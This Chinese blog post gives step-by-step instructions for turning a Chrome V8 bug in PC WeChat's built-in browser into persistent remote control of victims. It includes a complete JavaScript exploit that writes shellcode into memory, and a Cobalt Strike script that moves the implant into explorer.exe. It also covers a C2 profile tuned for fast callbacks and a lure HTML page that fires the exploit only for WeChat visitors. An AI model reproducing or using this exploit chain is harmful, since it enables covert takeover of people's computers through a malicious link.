<!DOCTYPE html><html lang="zh-CN" data-default-color-scheme="&#34;auto&#34;"><head><meta charset="UTF-8"><link rel="apple-touch-icon" sizes="76x76" href="https://gitee.com/sec-pengyy/sec-pengyy/raw/master/img/favicon.png"><link rel="icon" type="image/png" href="https://gitee.com/sec-pengyy/sec-pengyy/raw/master/img/favicon.png"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no,shrink-to-fit=no"><meta http-equiv="x-ua-compatible" content="ie=edge"><meta name="theme-color" content="#2f4154"><meta name="description" content="没有天生的大牛，更没有永远的菜鸟求知若饥 , 虚心若愚"><meta name="author" content="iceH"><meta name="keywords" content=""><title>关于微信内置浏览器 达到持久控制 - iceH’s Blog</title><link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css"><link rel="stylesheet" href="/lib/hint/hint.min.css"><link rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.1.2/styles/github-gist.min.css"><link rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css"><link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css"><link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css"><link rel="stylesheet" href="/css/main.css"><link rel="stylesheet" href="//cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/css/gundongtiao.css# 滚动条颜色.css"><link rel="stylesheet" href="//cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/css/shubiao.css# 鼠标指针.css"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css"><link rel="stylesheet" href="//cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/css/valine.css"><script id="fluid-configs">var Fluid=window.Fluid||{},CONFIG={hostname:"www.secice.cn",root:"/",version:"1.8.5",typing:{enable:!0,typeSpeed:70,cursorChar:"_",loop:!1},toc:{enable:!0,headingSelector:"h1,h2,h3,h4,h5,h6",collapseDepth:0},anchorjs:{enable:!0,element:"h1,h2,h3,h4,h5,h6",placement:"right",visible:"hover",icon:""},copy_btn:!0,image_zoom:{enable:!0},lazyload:{enable:!0,onlypost:!1},web_analytics:{enable:!1,baidu:null,google:null,gtag:null,tencent:{sid:null,cid:null},woyaola:null,cnzz:null,leancloud:{app_id:null,app_key:null,server_url:null}}}</script><script src="/js/utils.js"></script><script src="/js/color-schema.js"></script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="iceH’s Blog" type="application/atom+xml">
</head><body><header style="height:70vh"><nav id="navbar" class="navbar fixed-top navbar-expand-lg navbar-dark scrolling-navbar"><div class="container"><a class="navbar-brand" href="/">&nbsp;<strong>iceH's Blog</strong>&nbsp;</a> <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"><div class="animated-icon"><span></span><span></span><span></span></div></button><div class="collapse navbar-collapse" id="navbarSupportedContent"><ul class="navbar-nav ml-auto text-center"><li class="nav-item"><a class="nav-link" href="/"><i class="iconfont icon-home-fill"></i> 首页</a></li><li class="nav-item dropdown"><a class="nav-link dropdown-toggle" href="#" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><i class="iconfont icon-books"></i> 博文</a><div class="dropdown-menu" aria-labelledby="navbarDropdown"><a class="dropdown-item" href="/archives/"><i class="iconfont icon-archive-fill"></i> 归档 </a><a class="dropdown-item" href="/categories/"><i class="iconfont icon-category-fill"></i> 分类 </a><a class="dropdown-item" href="/tags/"><i class="iconfont icon-tags-fill"></i> 标签</a></div></li><li class="nav-item"><a class="nav-link" target="_blank" rel="noopener" href="https://wiki.secice.cn/"><i class="iconfont icon-kaggle"></i> Wiki</a></li><li class="nav-item"><a class="nav-link" href="/playlist/"><i class="iconfont icon-music"></i> 音乐</a></li><li class="nav-item"><a class="nav-link" href="/about/"><i class="iconfont icon-user-fill"></i> 关于</a></li><li class="nav-item"><a class="nav-link" href="/links/"><i class="iconfont icon-link-fill"></i> 友链</a></li><li class="nav-item" id="search-btn"><a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i class="iconfont icon-search"></i>&nbsp;</a></li><li class="nav-item" id="color-toggle-btn"><a class="nav-link" href="javascript:">&nbsp;<i class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a></li></ul></div></div></nav><div class="banner intro-2" id="background" parallax="true" style="background:url(https://gitee.com/sec-pengyy/sec-pengyy/raw/master/img/background1.jpg) no-repeat center center;background-size:cover"><div class="full-bg-img"><div class="mask flex-center" style="background-color:rgba(0,0,0,.3)"><div class="page-header text-center fade-in-up"><span class="h2" id="subtitle" title="关于微信内置浏览器 达到持久控制"></span><div class="mt-3"><span class="post-meta"><i class="iconfont icon-date-fill" aria-hidden="true"></i> <time datetime="2021-04-20 12:44" pubdate>2021年4月20日 下午</time></span></div><div class="mt-1"><span class="post-meta mr-2"><i class="iconfont icon-chart"></i> 1.3k 字 </span><span class="post-meta mr-2"><i class="iconfont icon-clock-fill"></i> 19 分钟</span></div></div></div></div></div></header><main><div class="container-fluid"><div class="row"><div class="d-none d-lg-block col-lg-2"></div><div class="col-lg-8 nopadding-md"><div class="container nopadding-md" id="board-ctn"><div class="py-5" id="board"><article class="post-content mx-auto"><h1 style="display:none">关于微信内置浏览器 达到持久控制</h1><div class="markdown-body"><h2 id="关于微信内置浏览器-达到持久控制"><a href="#关于微信内置浏览器-达到持久控制" class="headerlink" title="关于微信内置浏览器 达到持久控制"></a>关于微信内置浏览器 达到持久控制</h2><p>最近谷歌浏览器爆出了命令执行到处都是就不赘述了，由于微信调用了谷歌浏览器内核而且默认没开沙盒模式导致漏洞</p><p>但是爆出来的利用是依赖在微信浏览器进程上的，对方点击恶意链接后可正常上线可是一旦关闭内置浏览器就会失去控制权</p><h2 id="解决上述问题"><a href="#解决上述问题" class="headerlink" title="解决上述问题"></a>解决上述问题</h2><p>1.加载自定义 malleable C2配置文件 从而达到主机一上线跳默认为1秒，就可自动在目标打开浏览器短暂的时间里尽快转移进程</p><p>2.加载一个 Cobalt Strike automigrate自动迁移进程的插件从而达到目标上线后会话自动迁移到其他进程从而我们就可以脱离微信浏览器的束缚</p><h2 id="具体操作"><a href="#具体操作" class="headerlink" title="具体操作"></a>具体操作</h2><h3 id="1-加载自定义-malleable-C2配置文件"><a href="#1-加载自定义-malleable-C2配置文件" class="headerlink" title="1.加载自定义 malleable C2配置文件"></a>1.加载自定义 malleable C2配置文件</h3><pre><code class="hljs awk">https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/threatexpress/m</span>alleable-c2
</code></pre><h4 id="在此项目上找到你cs版本对应的配置文件，我这里用的4-0-各版本差别不大"><a href="#在此项目上找到你cs版本对应的配置文件，我这里用的4-0-各版本差别不大" class="headerlink" title="在此项目上找到你cs版本对应的配置文件，我这里用的4.0 各版本差别不大"></a>在此项目上找到你cs版本对应的配置文件，我这里用的4.0 各版本差别不大</h4><p>只需要修改心跳的设置为一秒<br>也可以用我改好的</p><h5 id="下载地址-：-jquery-c2-4-0-profile"><a href="#下载地址-：-jquery-c2-4-0-profile" class="headerlink" title="下载地址 ： jquery-c2.4.0.profile"></a>下载地址 ： <a target="_blank" rel="noopener" href="https://cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/images/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/20210420_%E5%85%B3%E4%BA%8E%E5%BE%AE%E4%BF%A1%E5%86%85%E7%BD%AE%E6%B5%8F%E8%A7%88%E5%99%A8%E8%BE%BE%E5%88%B0%E6%8C%81%E4%B9%85%E6%8E%A7%E5%88%B6/jquery-c2.4.0.profile">jquery-c2.4.0.profile</a></h5><h4 id="修改好后丢到服务端"><a href="#修改好后丢到服务端" class="headerlink" title="修改好后丢到服务端"></a>修改好后丢到服务端</h4><p>启动cobaltstrike时在最后面加上配置文件的名称就好<br><img src="https://cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/images/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/20210420_%E5%85%B3%E4%BA%8E%E5%BE%AE%E4%BF%A1%E5%86%85%E7%BD%AE%E6%B5%8F%E8%A7%88%E5%99%A8%E8%BE%BE%E5%88%B0%E6%8C%81%E4%B9%85%E6%8E%A7%E5%88%B6/01.jpg" srcset="/img/loading.gif" alt="开启服务"></p><h3 id="2-加载一个-Cobalt-Strike-automigrate自动迁移进程的插件"><a href="#2-加载一个-Cobalt-Strike-automigrate自动迁移进程的插件" class="headerlink" title="2.加载一个 Cobalt Strike automigrate自动迁移进程的插件"></a>2.加载一个 Cobalt Strike automigrate自动迁移进程的插件</h3><p>插件代码：</p><pre><code class="hljs agscript">on beacon_initial
&#123;
 sub callback
 &#123;
  $regex &#x3D; &#39;(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+&#39;;
  $listener &#x3D; &quot;wx&quot;;
  if ($2  ismatch $regex)
  &#123;
   $pid &#x3D; matched()[1];
   $inject_pid &#x3D; $pid;
   if (-is64 $1)
   &#123;
    $arch &#x3D; &quot;x64&quot;;
   &#125;
   else
   &#123;
    $arch &#x3D; &quot;x86&quot;;
   &#125;
   binject($1, $pid, $listener, $arch);
  &#125;
 &#125;
 if($inject_pid !&#x3D; beacon_info($1,&quot;pid&quot;))
 &#123;
  bps($1, &amp;callback);
 &#125;
&#125;
</code></pre><h4 id="复制到本地保存成一个-cna文件使用cobaltstrike加载插件就可"><a href="#复制到本地保存成一个-cna文件使用cobaltstrike加载插件就可" class="headerlink" title="复制到本地保存成一个.cna文件使用cobaltstrike加载插件就可"></a>复制到本地保存成一个.cna文件使用cobaltstrike加载插件就可</h4><p><img src="https://cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/images/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/20210420_%E5%85%B3%E4%BA%8E%E5%BE%AE%E4%BF%A1%E5%86%85%E7%BD%AE%E6%B5%8F%E8%A7%88%E5%99%A8%E8%BE%BE%E5%88%B0%E6%8C%81%E4%B9%85%E6%8E%A7%E5%88%B6/02.jpg" srcset="/img/loading.gif" alt="加载插件"></p><h2 id="测试："><a href="#测试：" class="headerlink" title="测试："></a>测试：</h2><h3 id="1-准备文件"><a href="#1-准备文件" class="headerlink" title="1.准备文件"></a>1.准备文件</h3><h4 id="新建一个监听器"><a href="#新建一个监听器" class="headerlink" title="新建一个监听器"></a>新建一个监听器</h4><p><code>监听器名字一定要设置成wx，不然无法自动迁移进程</code></p><p><img src="https://cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/images/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/20210420_%E5%85%B3%E4%BA%8E%E5%BE%AE%E4%BF%A1%E5%86%85%E7%BD%AE%E6%B5%8F%E8%A7%88%E5%99%A8%E8%BE%BE%E5%88%B0%E6%8C%81%E4%B9%85%E6%8E%A7%E5%88%B6/03.jpg" srcset="/img/loading.gif" alt="新建监听"></p><h4 id="生成一个shellcode"><a href="#生成一个shellcode" class="headerlink" title="生成一个shellcode"></a>生成一个shellcode</h4><p><img src="https://cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/images/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/20210420_%E5%85%B3%E4%BA%8E%E5%BE%AE%E4%BF%A1%E5%86%85%E7%BD%AE%E6%B5%8F%E8%A7%88%E5%99%A8%E8%BE%BE%E5%88%B0%E6%8C%81%E4%B9%85%E6%8E%A7%E5%88%B6/04.jpg" srcset="/img/loading.gif" alt="生成shellcode"></p><p>这里的就是你的shellcode，将所有<code>\</code>替换成<code>,0</code></p><p><img src="https://cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/images/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/20210420_%E5%85%B3%E4%BA%8E%E5%BE%AE%E4%BF%A1%E5%86%85%E7%BD%AE%E6%B5%8F%E8%A7%88%E5%99%A8%E8%BE%BE%E5%88%B0%E6%8C%81%E4%B9%85%E6%8E%A7%E5%88%B6/05.jpg" srcset="/img/loading.gif" alt="生成shellcode"></p><h4 id="替换js代码里的shellcode"><a href="#替换js代码里的shellcode" class="headerlink" title="替换js代码里的shellcode"></a>替换js代码里的shellcode</h4><p>exp.js代码如下：</p><pre><code class="hljs js">ENABLE_LOG = <span class="hljs-literal">true</span>;
IN_WORKER = <span class="hljs-literal">true</span>;

<span class="hljs-comment">// run calc and hang in a loop</span>
<span class="hljs-keyword">var</span> shellcode = [shellcode];
<span class="hljs-comment">//&quot;shellcode&quot;处放我们的shellcode</span>

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">print</span>(<span class="hljs-params">data</span>) </span>&#123;&#125;

<span class="hljs-keyword">var</span> not_optimised_out = <span class="hljs-number">0</span>;
<span class="hljs-keyword">var</span> target_function = (<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">value</span>) </span>&#123;
    <span class="hljs-keyword">if</span> (value == <span class="hljs-number">0xdecaf0</span>) &#123;
        not_optimised_out += <span class="hljs-number">1</span>;
    &#125;
    not_optimised_out += <span class="hljs-number">1</span>;
    not_optimised_out |= <span class="hljs-number">0xff</span>;
    not_optimised_out *= <span class="hljs-number">12</span>;
&#125;
);

<span class="hljs-keyword">for</span> (<span class="hljs-keyword">var</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">0x10000</span>; ++i) &#123;
    target_function(i);
&#125;

<span class="hljs-keyword">var</span> g_array;
<span class="hljs-keyword">var</span> tDerivedNCount = <span class="hljs-number">17</span> * <span class="hljs-number">87481</span> - <span class="hljs-number">8</span>;
<span class="hljs-keyword">var</span> tDerivedNDepth = <span class="hljs-number">19</span> * <span class="hljs-number">19</span>;

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">cb</span>(<span class="hljs-params">flag</span>) </span>&#123;
    <span class="hljs-keyword">if</span> (flag == <span class="hljs-literal">true</span>) &#123;
        <span class="hljs-keyword">return</span>;
    &#125;
    g_array = <span class="hljs-keyword">new</span> <span class="hljs-built_in">Array</span>(<span class="hljs-number">0</span>);
    g_array[<span class="hljs-number">0</span>] = <span class="hljs-number">0x1dbabe</span> * <span class="hljs-number">2</span>;
    <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;c01db33f&#x27;</span>;
&#125;

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">gc</span>(<span class="hljs-params"></span>) </span>&#123;
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">var</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">0x10000</span>; ++i) &#123;
        <span class="hljs-keyword">new</span> <span class="hljs-built_in">String</span>();
    &#125;
&#125;

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">oobAccess</span>(<span class="hljs-params"></span>) </span>&#123;
    <span class="hljs-keyword">var</span> this_ = <span class="hljs-built_in">this</span>;
    <span class="hljs-built_in">this</span>.buffer = <span class="hljs-literal">null</span>;
    <span class="hljs-built_in">this</span>.buffer_view = <span class="hljs-literal">null</span>;

    <span class="hljs-built_in">this</span>.page_buffer = <span class="hljs-literal">null</span>;
    <span class="hljs-built_in">this</span>.page_view = <span class="hljs-literal">null</span>;

    <span class="hljs-built_in">this</span>.prevent_opt = [];

    <span class="hljs-keyword">var</span> kSlotOffset = <span class="hljs-number">0x1f</span>;
    <span class="hljs-keyword">var</span> kBackingStoreOffset = <span class="hljs-number">0xf</span>;

    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">LeakArrayBuffer</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">ArrayBuffer</span> </span>&#123;
        <span class="hljs-function"><span class="hljs-title">constructor</span>(<span class="hljs-params"></span>)</span> &#123;
            <span class="hljs-built_in">super</span>(<span class="hljs-number">0x1000</span>);
            <span class="hljs-built_in">this</span>.slot = <span class="hljs-built_in">this</span>;
        &#125;
    &#125;

    <span class="hljs-built_in">this</span>.page_buffer = <span class="hljs-keyword">new</span> LeakArrayBuffer();
    <span class="hljs-built_in">this</span>.page_view = <span class="hljs-keyword">new</span> <span class="hljs-built_in">DataView</span>(<span class="hljs-built_in">this</span>.page_buffer);

    <span class="hljs-keyword">new</span> <span class="hljs-built_in">RegExp</span>(&#123;
        toString: <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) </span>&#123;
            <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;a&#x27;</span>
        &#125;
    &#125;);
    cb(<span class="hljs-literal">true</span>);

    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">DerivedBase</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">RegExp</span> </span>&#123;
        <span class="hljs-function"><span class="hljs-title">constructor</span>(<span class="hljs-params"></span>)</span> &#123;
            <span class="hljs-comment">// var array = null;</span>
            <span class="hljs-built_in">super</span>(<span class="hljs-comment">// at this point, the 4-byte allocation for the JSRegExp `this` object</span>
            <span class="hljs-comment">// has just happened.</span>
            &#123;
                toString: cb
            &#125;, <span class="hljs-string">&#x27;g&#x27;</span><span class="hljs-comment">// now the runtime JSRegExp constructor is called, corrupting the</span>
            <span class="hljs-comment">// JSArray.</span>
            );

            <span class="hljs-comment">// this allocation will now directly follow the FixedArray allocation</span>
            <span class="hljs-comment">// made for `this.data`, which is where `array.elements` points to.</span>
            this_.buffer = <span class="hljs-keyword">new</span> <span class="hljs-built_in">ArrayBuffer</span>(<span class="hljs-number">0x80</span>);
            g_array[<span class="hljs-number">8</span>] = this_.page_buffer;
        &#125;
    &#125;

    <span class="hljs-comment">// try&#123;</span>
    <span class="hljs-keyword">var</span> derived_n = <span class="hljs-built_in">eval</span>(<span class="hljs-string">`(function derived_n(i) &#123;</span>
<span class="hljs-string">        if (i == 0) &#123;</span>
<span class="hljs-string">            return DerivedBase;</span>
<span class="hljs-string">        &#125;</span>
<span class="hljs-string"></span>
<span class="hljs-string">        class DerivedN extends derived_n(i-1) &#123;</span>
<span class="hljs-string">            constructor() &#123;</span>
<span class="hljs-string">                super();</span>
<span class="hljs-string">                return;</span>
<span class="hljs-string">                <span class="hljs-subst">$&#123;<span class="hljs-string">&quot;this.a=0;&quot;</span>.repeat(tDerivedNCount)&#125;</span></span>
<span class="hljs-string">            &#125;</span>
<span class="hljs-string">        &#125;</span>
<span class="hljs-string"></span>
<span class="hljs-string">        return DerivedN;</span>
<span class="hljs-string">    &#125;)`</span>);

    gc();

    <span class="hljs-keyword">new</span> (derived_n(tDerivedNDepth))();

    <span class="hljs-built_in">this</span>.buffer_view = <span class="hljs-keyword">new</span> <span class="hljs-built_in">DataView</span>(<span class="hljs-built_in">this</span>.buffer);
    <span class="hljs-built_in">this</span>.leakPtr = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">obj</span>) </span>&#123;
        <span class="hljs-built_in">this</span>.page_buffer.slot = obj;
        <span class="hljs-keyword">return</span> <span class="hljs-built_in">this</span>.buffer_view.getUint32(kSlotOffset, <span class="hljs-literal">true</span>, ...this.prevent_opt);
    &#125;

    <span class="hljs-built_in">this</span>.setPtr = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">addr</span>) </span>&#123;
        <span class="hljs-built_in">this</span>.buffer_view.setUint32(kBackingStoreOffset, addr, <span class="hljs-literal">true</span>, ...this.prevent_opt);
    &#125;

    <span class="hljs-built_in">this</span>.read32 = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">addr</span>) </span>&#123;
        <span class="hljs-built_in">this</span>.setPtr(addr);
        <span class="hljs-keyword">return</span> <span class="hljs-built_in">this</span>.page_view.getUint32(<span class="hljs-number">0</span>, <span class="hljs-literal">true</span>, ...this.prevent_opt);
    &#125;

    <span class="hljs-built_in">this</span>.write32 = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">addr, value</span>) </span>&#123;
        <span class="hljs-built_in">this</span>.setPtr(addr);
        <span class="hljs-built_in">this</span>.page_view.setUint32(<span class="hljs-number">0</span>, value, <span class="hljs-literal">true</span>, ...this.prevent_opt);
    &#125;

    <span class="hljs-built_in">this</span>.write8 = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">addr, value</span>) </span>&#123;
        <span class="hljs-built_in">this</span>.setPtr(addr);
        <span class="hljs-built_in">this</span>.page_view.setUint8(<span class="hljs-number">0</span>, value, ...this.prevent_opt);
    &#125;

    <span class="hljs-built_in">this</span>.setBytes = <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params">addr, content</span>) </span>&#123;
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">var</span> i = <span class="hljs-number">0</span>; i &lt; content.length; i++) &#123;
            <span class="hljs-built_in">this</span>.write8(addr + i, content[i]);
        &#125;
    &#125;
    <span class="hljs-keyword">return</span> <span class="hljs-built_in">this</span>;
&#125;

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">trigger</span>(<span class="hljs-params"></span>) </span>&#123;
    <span class="hljs-keyword">var</span> oob = oobAccess();

    <span class="hljs-keyword">var</span> func_ptr = oob.leakPtr(target_function);
    print(<span class="hljs-string">&#x27;[*] target_function at 0x&#x27;</span> + func_ptr.toString(<span class="hljs-number">16</span>));

    <span class="hljs-keyword">var</span> kCodeInsOffset = <span class="hljs-number">0x1b</span>;

    <span class="hljs-keyword">var</span> code_addr = oob.read32(func_ptr + kCodeInsOffset);
    print(<span class="hljs-string">&#x27;[*] code_addr at 0x&#x27;</span> + code_addr.toString(<span class="hljs-number">16</span>));

    oob.setBytes(code_addr, shellcode);

    target_function(<span class="hljs-number">0</span>);
&#125;

<span class="hljs-keyword">try</span> &#123;
    print(<span class="hljs-string">&quot;start running&quot;</span>);
    trigger();
&#125; <span class="hljs-keyword">catch</span> (e) &#123;
    print(e);
&#125;</code></pre><p>将上面生成的shellcode 替换到此处<br><img src="https://cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/images/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/20210420_%E5%85%B3%E4%BA%8E%E5%BE%AE%E4%BF%A1%E5%86%85%E7%BD%AE%E6%B5%8F%E8%A7%88%E5%99%A8%E8%BE%BE%E5%88%B0%E6%8C%81%E4%B9%85%E6%8E%A7%E5%88%B6/06.jpg" srcset="/img/loading.gif" alt="替换shellcode内容"></p><h4 id="创建一个html文件调用js"><a href="#创建一个html文件调用js" class="headerlink" title="创建一个html文件调用js"></a>创建一个html文件调用js</h4><pre><code class="hljs html"><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-meta-keyword">html</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">html</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">head</span>&gt;</span>
    <span class="hljs-tag">&lt;<span class="hljs-name">title</span>&gt;</span>正在加载网页<span class="hljs-tag">&lt;/<span class="hljs-name">title</span>&gt;</span>
    <span class="hljs-tag">&lt;<span class="hljs-name">meta</span> <span class="hljs-attr">charset</span>=<span class="hljs-string">&quot;utf-8&quot;</span>&gt;</span>
    <span class="hljs-tag">&lt;<span class="hljs-name">script</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;text/javascript&quot;</span>&gt;</span>
<span class="javascript">    <span class="hljs-comment">// 对浏览器的UserAgent进行正则匹配，不含有微信独有标识的则为其他浏览器</span></span>
<span class="javascript">    <span class="hljs-keyword">var</span> useragent = navigator.userAgent;</span>
<span class="javascript">    <span class="hljs-keyword">if</span> (useragent.match(<span class="hljs-regexp">/WindowsWechat/i</span>) != <span class="hljs-string">&#x27;WindowsWechat&#x27;</span>) &#123;</span>
<span class="javascript">        <span class="hljs-comment">// 这里警告框会阻塞当前页面继续加载</span></span>
<span class="javascript">        alert(<span class="hljs-string">&#x27;已禁止本次访问：您必须使用PC端微信内置浏览器访问本页面！&#x27;</span>);</span>
<span class="javascript">        <span class="hljs-comment">// 以下代码是用javascript强行关闭当前页面</span></span>
<span class="javascript">        <span class="hljs-keyword">var</span> opened = <span class="hljs-built_in">window</span>.open(<span class="hljs-string">&#x27;about:blank&#x27;</span>, <span class="hljs-string">&#x27;_self&#x27;</span>);</span>
<span class="javascript">        opened.opener = <span class="hljs-literal">null</span>;</span>
        opened.close();
    &#125;
    <span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>
    <span class="hljs-tag">&lt;<span class="hljs-name">script</span> <span class="hljs-attr">src</span>=<span class="hljs-string">&quot;exp.js&quot;</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>
    <span class="hljs-tag">&lt;<span class="hljs-name">div</span> <span class="hljs-attr">style</span>=<span class="hljs-string">&quot;font-size: 1.3em;margin: 10px auto;width: 200px;display: block;&quot;</span>&gt;</span>
正在加载网页中...
<span class="hljs-tag">&lt;/<span class="hljs-name">div</span>&gt;</span>
<span class="hljs-tag">&lt;/<span class="hljs-name">head</span>&gt;</span></code></pre><h3 id="2-搭建服务"><a href="#2-搭建服务" class="headerlink" title="2.搭建服务"></a>2.搭建服务</h3><h4 id="随便拿什么搭都可以-我直接用phpstudy搭建下"><a href="#随便拿什么搭都可以-我直接用phpstudy搭建下" class="headerlink" title="随便拿什么搭都可以 我直接用phpstudy搭建下"></a>随便拿什么搭都可以 我直接用phpstudy搭建下</h4><p><img src="https://cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/images/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/20210420_%E5%85%B3%E4%BA%8E%E5%BE%AE%E4%BF%A1%E5%86%85%E7%BD%AE%E6%B5%8F%E8%A7%88%E5%99%A8%E8%BE%BE%E5%88%B0%E6%8C%81%E4%B9%85%E6%8E%A7%E5%88%B6/07.jpg" srcset="/img/loading.gif" alt="搭建服务"></p><h3 id="测试上线与进程转移效果"><a href="#测试上线与进程转移效果" class="headerlink" title="测试上线与进程转移效果"></a>测试上线与进程转移效果</h3><p>可以看的会上线两个 beacon 基于微信的会话在浏览器关闭后即掉线<br><img src="https://cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/images/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/20210420_%E5%85%B3%E4%BA%8E%E5%BE%AE%E4%BF%A1%E5%86%85%E7%BD%AE%E6%B5%8F%E8%A7%88%E5%99%A8%E8%BE%BE%E5%88%B0%E6%8C%81%E4%B9%85%E6%8E%A7%E5%88%B6/08.jpg" srcset="/img/loading.gif" alt="坚挺的会话"></p><h3 id="而转移到explorer-exe的会话依然坚挺！"><a href="#而转移到explorer-exe的会话依然坚挺！" class="headerlink" title="而转移到explorer.exe的会话依然坚挺！"></a>而转移到explorer.exe的会话依然坚挺！</h3><p><img src="https://cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/images/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/20210420_%E5%85%B3%E4%BA%8E%E5%BE%AE%E4%BF%A1%E5%86%85%E7%BD%AE%E6%B5%8F%E8%A7%88%E5%99%A8%E8%BE%BE%E5%88%B0%E6%8C%81%E4%B9%85%E6%8E%A7%E5%88%B6/09.jpg" srcset="/img/loading.gif" alt="上号"></p></div><hr><div><div class="post-metas mb-3"><div class="post-meta mr-3"><i class="iconfont icon-category"></i> <a class="hover-with-bg" href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">漏洞复现</a></div><div class="post-meta"><i class="iconfont icon-tags"></i> <a class="hover-with-bg" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">漏洞复现</a> <a class="hover-with-bg" href="/tags/%E5%BE%AE%E4%BF%A1/">微信</a></div></div><p class="note note-warning"><strong>本文作者: </strong><a href="/">iceH</a><br><strong>本文链接: </strong><a href="http://www.secice.cn/p/1bc7f83f">http://www.secice.cn/p/1bc7f83f</a><br><strong>版权声明: </strong>本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p><div class="post-prevnext row"><article class="post-prev col-6"></article><article class="post-next col-6"><a href="/p/edaf7f2c"><span class="hidden-mobile">Golang学习之面向对象编程</span> <span class="visible-mobile">下一篇</span> <i class="iconfont icon-arrowright"></i></a></article></div></div><article class="comments" id="comments"><div id="vcomments"></div><script type="text/javascript">Fluid.utils.waitElementVisible("vcomments",(function(){Fluid.utils.createScript("https://cdn.staticfile.org/valine/1.4.14/Valine.min.js",(function(){new Valine({el:"#vcomments",app_id:"MnjV8raNBztIVGGKiicFL3Sq-MdYXbMMI",app_key:"hS70MmgmzDqbMSkSAfkDe42h",placeholder:"留下你的小脚印吧...",path:window.location.pathname,avatar:"wavatar",meta:["nick","mail"],pageSize:"10",lang:"zh-CN",highlight:!1,recordIP:!1,serverURLs:""})}))}))</script><noscript>Please enable JavaScript to view the <a target="_blank" href="https://valine.js.org" rel="nofollow noopener noopener">comments powered by Valine.</a></noscript></article></article></div></div></div><div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn"><div id="toc"><p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p><div class="toc-body" id="toc-body"></div></div></div></div></div><div class="col-lg-7 mx-auto nopadding-md"><div class="container custom post-custom mx-auto"><img src="https://cdn.jsdelivr.net/gh/root-iceH/root-iceH.github.io/img/psb.gif" 